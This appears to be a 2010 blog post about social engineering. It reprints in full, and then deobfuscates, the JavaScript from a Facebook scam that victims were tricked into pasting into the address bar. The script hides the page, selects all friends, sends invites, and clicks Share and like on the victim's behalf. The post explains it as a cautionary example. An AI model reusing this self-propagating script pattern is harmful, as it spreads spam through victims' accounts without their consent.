It’s amazing how many people fall for scams and social engineering tricks on the internet. Some may remember the classic “I Love you” virus from back at the start of the century: it infected 50 million users within a week or two. It was actually a very amateurish virus except for one detail: social engineering. The mere name of the attachment was enough to entice people to open and execute the attached script. Fast forward ten years …………
Ten years later, the year is 2010, and computers are more common place, and generally one would expect people to be more computer savvy. Yet today on facebook I saw lots of people had clicked on and executed a script from a site talking claiming to have “The 9 Safest Ways to Have Unprotected Sex”. Over a quarter of a million facebook users have fallen to this social engineering. This one is a bit benign, but it’s still social engineering that gets people to execute a script that otherwise wouldn’t be able to.
The site gets people to copy text to the clipboard then paste that in IE’s address bar. The text is :
BLOCKED SCRIPT(function(){a='app110142809028483_jop';b='app110142809028483_jode';ifc='app110142809028483_ifc'; ifo='app110142809028483_ifo';mw='app110142809028483_mwrapper';var _0xa049=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x73\x6C\x69\x6E\x6B","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xa049[2]](mw)[_0xa049[1]][_0xa049[0]]=_0xa049[3];d[_0xa049[2]](a)[_0xa049[4]]=d[_0xa049[2]](b)[_0xa049[5]];d[_0xa049[2]](_0xa049[7])[_0xa049[6]]();setTimeout(function (){fs[_0xa049[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xa049[11]](_0xa049[9],_0xa049[10]);setTimeout(function (){d[_0xa049[2]](_0xa049[12])[_0xa049[6]]();setTimeout(function (){inp=document[_0xa049[14]](_0xa049[13]);for(i in inp){if(inp[i][_0xa049[5]]==_0xa049[15]){inp[i][_0xa049[6]]();} ;} ;setTimeout(function (){d[_0xa049[2]](_0xa049[16])[_0xa049[6]]();d[_0xa049[2]](ifo)[_0xa049[4]]=d[_0xa049[2]](ifc)[_0xa049[5]];} ,5000);} ,3000);} ,3000);} ,5000);})();
Which basically translates to :
BLOCKED SCRIPT(function(){
a='app110142809028483_jop';
b='app110142809028483_jode';
ifc='app110142809028483_ifc';
ifo='app110142809028483_ifo';
mw='app110142809028483_mwrapper';
d=document;
d["getElementById"](mw)["style"]["visibility"]= "hidden";
d["getElementById"](a)["innerHTML"]=d["getElementById"](b)["value"];
d["getElementById"]("suggest")["click"]();
setTimeout(function (){fs["select_all"]();} ,5000);
setTimeout(function (){SocialGraphManager["submitDialog"]("sgm_invite_form","/ajax/social_graph/invite_dialog.php");
setTimeout(function (){d["getElementById"]("slink")["click"]();
setTimeout(function (){inp=document["getElementsByTagName"]("input");
for(i in inp){if(inp[i]["value"]=="Share"){inp[i]["click"]();} ;} ;
setTimeout(function (){d["getElementById"]("likeme")["click"]();
d["getElementById"](ifo)["innerHTML"]=d["getElementById"](ifc)["value"];}
,5000);} ,3000);} ,3000);} ,5000);
})();
In that script it has timeouts that click on buttons, hence getting people to suggest it to other people, liking it, etc. without the person actually explicitly clicking on the submit buttons.
It’s classic social engineering, and people still fall for it. Oh wait … it’s facebook ;)